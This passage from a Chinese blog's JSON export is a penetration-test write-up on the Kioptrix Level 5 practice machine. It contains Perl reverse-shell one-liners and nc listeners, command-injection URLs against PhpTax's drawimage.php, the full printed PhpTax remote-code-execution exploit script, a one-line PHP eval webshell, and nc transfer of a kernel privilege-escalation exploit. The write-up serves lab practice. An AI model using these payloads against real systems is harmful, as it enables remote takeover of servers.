\/><\/div><\/p>\n<p>\u53d1\u73b0IP\u4e0d\u5c0f\u5fc3\u586b\u6210\u9776\u573aIP\u4e86\uff0c\u4e00\u76f4\u8fde\u4e0d\u4e0a\u3002\u3002\u3002\u3002\u91cd\u65b0\u6765\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217185.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217185.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129185656208\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u77e5\u9053\u54ea\u91cc\u5e03\u7f6e\u7684\u4e0d\u5bf9\uff0c\u91cd\u65b0\u6765\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-perl\"># Server\nxxx;perl -e &#039;use 
Socket;$i=&quot;192.168.244.133&quot;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/sh -i&quot;);};&#039;\n# Client \nnc -nlkvp 1234<\/code><\/pre>\n<p>\u7f16\u7801\u5b8c\u4ee5\u540e\uff0c\u8fd8\u662f\u641e\u4e0d\u5230\u3002\u3002\u3002\u3002\u53ef\u80fd\u4e4b\u524d\u5565\u5730\u65b9\u505a\u7684\u4e0d\u592a\u5bf9\uff0c\u91cd\u65b0\u68b3\u7406\u4e00\u4e0b\u601d\u8def\u641e\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n<p>\u2460 \u6293\u5305<\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.244.144:8080\/phptax<\/code><\/pre>\n<p>\u2461\u4fee\u6539<code>User-Agent:Mozilla\/4.0 Mozilla4_browser<\/code><\/p>\n<p>\u2462\u7f16\u7801<code>\u53cd\u5f39shell<\/code>\u63d2\u5165<code>payload<\/code>\uff1a<\/p>\n<pre><code class=\"language-perl\"># perl \u53cd\u5f39shell\nperl -e &#039;use Socket;$i=&quot;192.168.244.133&quot;;$p=2233;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/sh -i&quot;);};&#039;\n# payload\uff1a\nhttp:\/\/localhost\/phptax\/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20\/bin\/bash;&pdf=make\n# \u4fee\u6539\u540e\nhttp:\/\/192.168.244.144:8080\/phptax\/drawimage.php?pfilez=xxx;perl -e \u2018use Socket;$i=\u201d192.168.244.133&quot;; $p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\u201ctcp\u201d));if(connect(S,sockaddr_in( {open(STDIN,\u201d&gt;&amp;S\u201d);open(STDOUT,\u201d&gt;&amp;S\u201d);open(STDERR,\u201d&gt;&amp;S\u201d);exec(\u201c\/ bin\/sh -i\u201d);};\u2019;&amp;pdf=make\n# 
\u7f16\u7801\u540e\nhttp:\/\/192.168.244.144:8080\/phptax\/drawimage.php?pfilez=xxx;perl+-e+%27use+Socket%3B%24i%3D%22192.168.244.133%22%3B%24p%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh+-i%22%29%3B%7D%3B%27;&pdf=make\n# \u5f00\u542f\u76d1\u542c\nnc -lvnp 1234<\/code><\/pre>\n<p>\u4e0d\u77e5\u9053\u4e3a\u5565\uff0c\u8fd9\u91cc\u5c31\u662f\u8fde\u4e0d\u4e0a\u53bb\u3002\u3002\u3002\u3002\u3002<\/p>\n<p>\u6362\u4e00\u4e2a\u529e\u6cd5\u5427\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217186.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217186.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129203101864\" \/><\/div><\/p>\n<pre><code class=\"language-php\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ cat 25849.txt\n#\n#  ,--^----------,--------,-----,-------^--,\n#  | |||||||||   `--------&#039;     |          O .. 
CWH Underground Hacking Team ..\n#  `+---------------------------^----------|\n#    `\\_,-------, _________________________|\n#      \/ XXXXXX \/`|     \/\n#     \/ XXXXXX \/  `\\   \/\n#    \/ XXXXXX \/\\______(\n#   \/ XXXXXX \/\n#  \/ XXXXXX \/\n# (________(\n#  `------&#039;\n\n# Exploit Title   : PhpTax File Manipulation(newvalue,field) Remote Code Execution\n# Date            : 31 May 2013\n# Exploit Author  : CWH Underground\n# Site            : www.2600.in.th\n# Vendor Homepage : http:\/\/phptax.sourceforge.net\/\n# Software Link   : http:\/\/sourceforge.net\/projects\/phptax\/\n# Version         : 0.8\n# Tested on       : Window and Linux\n\n#####################################################\n#VULNERABILITY: FILE MANIPULATION TO REMOTE COMMAND EXECUTION\n#####################################################\n\n#index.php\n\n#LINE 32: fwrite fwrite($zz, &quot;$_GET[&#039;newvalue&#039;]&quot;);\n#LINE 31: $zz = fopen(&quot;.\/data\/$field&quot;, &quot;w&quot;);\n#LINE  2: $field = $_GET[&#039;field&#039;];\n\n#####################################################\n#DESCRIPTION\n#####################################################\n\n#An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability.\n#User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file.\n#An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server.\n\n#####################################################\n#EXPLOIT\n#####################################################\n\n&lt;?php\n\n$options = getopt(&#039;u:&#039;);\n\nif(!isset($options[&#039;u&#039;]))\ndie(&quot;\\n        Usage example: php exploit.php -u http:\/\/target.com\/ \\n&quot;);\n\n$url     =  $options[&#039;u&#039;];\n$shell = &quot;{$url}\/index.php?field=rce.php&amp;newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E&quot;;\n\n$headers = 
array(&#039;User-Agent: Mozilla\/4.0 (compatible; MSIE 5.01; Windows NT 5.0)&#039;,\n&#039;Content-Type: text\/plain&#039;);\n\necho &quot;        [+] Submitting request to: {$options[&#039;u&#039;]}\\n&quot;;\n\n$handle = curl_init();\n\ncurl_setopt($handle, CURLOPT_URL, $url);\ncurl_setopt($handle, CURLOPT_HTTPHEADER, $headers);\ncurl_setopt($handle, CURLOPT_RETURNTRANSFER, true);\n\n$source = curl_exec($handle);\ncurl_close($handle);\n\nif(!strpos($source, &#039;Undefined variable: HTTP_RAW_POST_DATA&#039;) &amp;&amp; @fopen($shell, &#039;r&#039;))\n{\necho &quot;        [+] Exploit completed successfully!\\n&quot;;\necho &quot;        ______________________________________________\\n\\n        {$url}\/data\/rce.php?cmd=id\\n&quot;;\n}\nelse\n{\ndie(&quot;        [+] Exploit was unsuccessful.\\n&quot;);\n}\n\n?&gt;\n\n################################################################################################################\n# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2\n################################################################################################################ <\/code><\/pre>\n<p>\u6ce8\u610f\u5230<\/p>\n<pre><code class=\"language-php\">\/index.php?field=rce.php&amp;newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E\n==&gt; \/index.php?field=rce.php&amp;newvalue=&lt;?php passthru($_GET[cmd]);?&gt;<\/code><\/pre>\n<p>\u901a\u8fc7<code>field<\/code>\u548c<code>newvalue<\/code>\u53c2\u6570\u521b\u5efa\u6587\u4ef6\uff0c\u5e76\u5199\u5165\u547d\u4ee4\u6267\u884c\u4ee3\u7801\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217187.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217187.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129204256359\" \/><\/div><\/p>\n<p>\u8c8c\u4f3c\u6267\u884c\u6210\u529f\u4e86\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u770b\u770b\u80fd\u4e0d\u80fd\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217188.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217188.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129204357760\" \/><\/div><\/p>\n<p>\u6210\u529f\uff01\u8fd9\u6837\u4e00\u6765\u5c31\u597d\u529e\u4e86\uff0c\u5199\u4e00\u4e2a\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u7136\u540e\u8fde\u63a5\uff1a<\/p>\n<pre><code class=\"language-php\">http:\/\/192.168.244.144:8080\/phptax\/index.php?field=rce.php&amp;newvalue=&lt;?php @eval($_POST[&#039;hack&#039;]);?&gt;<\/code><\/pre>\n<p>\u8681\u5251\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217189.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217189.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129205132178\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217190.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217190.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129205147206\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u5230\u666e\u901a\u7528\u6237\u6743\u9650\u4e86\uff0c\u5c1d\u8bd5\u4f7f\u7528\u5185\u6838\u6f0f\u6d1e\u8fdb\u884c\u63d0\u6743\uff0c\u4e0d\u8fc7\u6211\u4eec\u53ef\u4ee5\u4fdd\u9669\u8d77\u89c1\uff0c\u518d\u67e5\u4e00\u4e0b\u5185\u6838\u7248\u672c\u5bf9\u4e0d\u5bf9\uff1a<\/p>\n<pre><code class=\"language-shell\">(www:\/usr\/local\/www\/apache22\/data2\/phptax\/data) $ uname -a\nFreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     
root@farrell.cse.buffalo.edu:\/usr\/obj\/usr\/src\/sys\/GENERIC  amd64<\/code><\/pre>\n<p>\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<pre><code class=\"language-shell\"># Server \ncd \/tmp\nnc 192.168.244.133 1234 &gt; 26368.c\n# Client\nnc -lvp 1234 &lt; 26368.c <\/code><\/pre>\n<p>\u76d1\u542c\u4f1a\u4e2d\u65ad\uff0c\u4f46\u662f\u5df2\u7ecf\u4f20\u8fc7\u53bb\u4e86\u3002<\/p>\n<p>\u7f16\u8bd1\u8fd0\u884c\u5373\u53ef\u83b7\u5f97 root \u6743\u9650\uff0c\u4f46\u662f\u6211\u8fd9\u91cc\u4e0d\u77e5\u9053\u4e3a\u5565\u4e00\u76f4\u4e0d\u884c\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217191.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217191.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129213322195\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c31\u5230\u8fd9\u5427\uff0c<code>metasploit<\/code>\u4e5f\u5c1d\u8bd5\u4e86\uff0c\u6b7b\u90fd\u641e\u4e0d\u597d\uff0c\u53ef\u6076\uff0c\u96be\u9053\u53c8\u72af\u4f4e\u7ea7\u9519\u8bef\u4e86\uff1f<\/p>\n<h2>\u91cd\u542f\u9776\u573a\uff0c\u5168\u90e8\u63a8\u5012\u91cd\u6765<\/h2>\n<p>\u56e0\u4e3a\u662f\u91cd\u65b0\u6765\uff0c\u6211\u5c31\u4e0d\u8bf4\u4e86\uff0c\u4ec5\u5c55\u793a\u5173\u952e\u4ee3\u7801\u53ca\u7ed3\u679c\u662f\u5426\u6b63\u786e\uff1a<\/p>\n<pre><code class=\"language-perl\">\/phptax\/drawimage.php?pfilez=xxx;%20perl -e &#039;use 
Socket;$i=&quot;192.168.244.144&quot;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/bash -i&quot;);};&#039;;&amp;pdf=make\n# URL\u7f16\u7801\n\/phptax\/drawimage.php?pfilez=xxx;%20perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.244.144%22%3B%24p%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22\/bin\/bash%20-i%22%29%3B%7D%3B&#039;;&amp;pdf=make<\/code><\/pre>\n<p>\u7ecf\u8fc7\u5c1d\u8bd5\uff0c\u5931\u8d25\uff0c\u4e0d\u77e5\u9053\u662f\u5565\u539f\u56e0\uff0c\u4e0b\u56de\u518d\u8bd5\u5427\uff0c\u6709\u5176\u4ed6\u4e8b\u60c5\u8981\u5fd9\u4e86\uff0c\u5bb3\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>KIOPTRIX LEVEL 5\uff08\u5931\u8d25\uff09 \u6f2b\u957f\u7684debug\uff08\u7f51\u5361\u65e0\u6cd5\u8fde\u63a5\/\u65e0\u6cd5\u83b7\u53d6IP\uff09 \u6253\u5f00\u73af\u5883\uff0c\u5982\u679c\u83b7\u53d6\u4e0d 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-331","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/331","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=331"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/331\/revisions"}],"predecessor-version":[{"id":332,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/331\/revisions\/332"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=331"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=331"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=331"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}